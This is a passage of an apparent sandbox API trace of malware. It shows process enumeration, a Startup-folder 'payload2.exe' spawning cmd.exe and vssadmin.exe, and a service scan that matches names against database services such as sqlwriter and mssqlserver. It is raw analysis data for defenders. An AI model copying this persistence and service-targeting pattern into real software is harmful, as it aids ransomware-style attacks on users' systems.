th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0044.155] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0044.155] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0044.156] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0044.156] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0044.458] lstrlenW (lpString="eating.exe") returned 10 [0044.458] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0044.459] lstrlenW (lpString="nh_protected.exe") returned 16 [0044.459] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0044.460] lstrlenW (lpString="vulnerability.exe") returned 17 [0044.460] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0044.460] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0044.460] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0044.461] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0044.461] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0044.462] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0044.462] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0044.462] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0044.462] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0044.463] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0044.463] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0044.463] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0044.463] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0044.464] lstrlenW (lpString="cmd.exe") returned 7 [0044.464] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.465] lstrlenW (lpString="conhost.exe") returned 11 [0044.465] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0044.465] lstrlenW (lpString="vssadmin.exe") returned 12 [0044.465] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0044.466] lstrlenW (lpString="VSSVC.exe") returned 9 [0044.466] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0044.467] CloseHandle (hObject=0x1bc) returned 1 [0044.467] Sleep (dwMilliseconds=0x1f4) [0045.494] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6803a0 [0045.494] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0045.495] GetLastError () returned 0xea [0045.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x123e) returned 0x39406f0 [0045.495] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39406f0, cbBufSize=0x123e, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39406f0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0045.495] CloseServiceHandle (hSCObject=0x6803a0) returned 1 [0045.495] lstrlenW (lpString="Appinfo") returned 7 [0045.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0045.495] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0045.496] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0045.496] lstrlenW (lpString="AudioSrv") returned 8 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0045.496] lstrlenW (lpString="BFE") returned 3 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0045.496] lstrlenW (lpString="CryptSvc") returned 8 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0045.496] lstrlenW (lpString="CscService") returned 10 [0045.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0045.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0045.496] lstrlenW (lpString="DcomLaunch") returned 10 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0045.497] lstrlenW (lpString="Dhcp") returned 4 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0045.497] lstrlenW (lpString="Dnscache") returned 8 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0045.497] lstrlenW (lpString="DPS") returned 3 [0045.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0045.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0045.497] lstrlenW (lpString="eventlog") returned 8 [0045.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0045.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0045.514] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0045.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0045.514] lstrlenW (lpString="EventSystem") returned 11 [0045.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0045.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0045.514] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0045.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0045.514] lstrlenW (lpString="gpsvc") returned 5 [0045.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0045.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0045.514] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0045.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0045.514] lstrlenW (lpString="iphlpsvc") returned 8 [0045.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0045.514] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0045.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0045.514] lstrlenW (lpString="LanmanServer") returned 12 [0045.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0045.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0045.514] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0045.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0045.514] lstrlenW (lpString="LanmanWorkstation") returned 17 [0045.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0045.514] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0045.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0045.514] lstrlenW (lpString="lmhosts") returned 7 [0045.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0045.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0045.514] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0045.515] lstrlenW (lpString="MMCSS") returned 5 [0045.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0045.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0045.515] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0045.515] lstrlenW (lpString="MpsSvc") returned 6 [0045.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0045.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0045.515] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0045.515] lstrlenW (lpString="Netman") returned 6 [0045.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0045.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0045.515] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0045.515] lstrlenW (lpString="netprofm") returned 8 [0045.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0045.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0045.515] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0045.515] lstrlenW (lpString="NlaSvc") returned 6 [0045.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0045.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0045.515] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0045.515] lstrlenW (lpString="nsi") returned 3 [0045.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0045.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0045.515] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0045.515] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0045.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0045.515] lstrlenW (lpString="PcaSvc") returned 6 [0045.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0045.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0045.516] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0045.516] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0045.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0045.516] lstrlenW (lpString="PlugPlay") returned 8 [0045.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0045.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0045.516] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0045.516] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0045.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0045.516] lstrlenW (lpString="Power") returned 5 [0045.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0045.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0045.516] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0045.516] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0045.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0045.516] lstrlenW (lpString="ProfSvc") returned 7 [0045.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0045.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0045.516] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0045.516] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0045.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0045.516] lstrlenW (lpString="RpcEptMapper") returned 12 [0045.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.516] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0045.516] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0045.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0045.516] lstrlenW (lpString="RpcSs") returned 5 [0045.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0045.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0045.516] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0045.516] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0045.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0045.516] lstrlenW (lpString="SamSs") returned 5 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0045.517] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0045.517] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0045.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0045.517] lstrlenW (lpString="Schedule") returned 8 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0045.517] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0045.517] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0045.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0045.517] lstrlenW (lpString="SENS") returned 4 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0045.517] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0045.517] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0045.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0045.517] lstrlenW (lpString="ShellHWDetection") returned 16 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.517] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0045.517] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0045.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0045.517] lstrlenW (lpString="Spooler") returned 7 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0045.517] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0045.517] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0045.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0045.517] lstrlenW (lpString="SysMain") returned 7 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0045.517] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0045.517] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0045.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0045.517] lstrlenW (lpString="Themes") returned 6 [0045.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0045.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0045.518] lstrlenW (lpString="TrkWks") returned 6 [0045.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0045.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0045.518] lstrlenW (lpString="UxSms") returned 5 [0045.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0045.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0045.518] lstrlenW (lpString="VSS") returned 3 [0045.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0045.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0045.518] lstrlenW (lpString="WdiServiceHost") returned 14 [0045.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0045.518] lstrlenW (lpString="WdiSystemHost") returned 13 [0045.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0045.518] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0045.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.518] lstrcmpiW 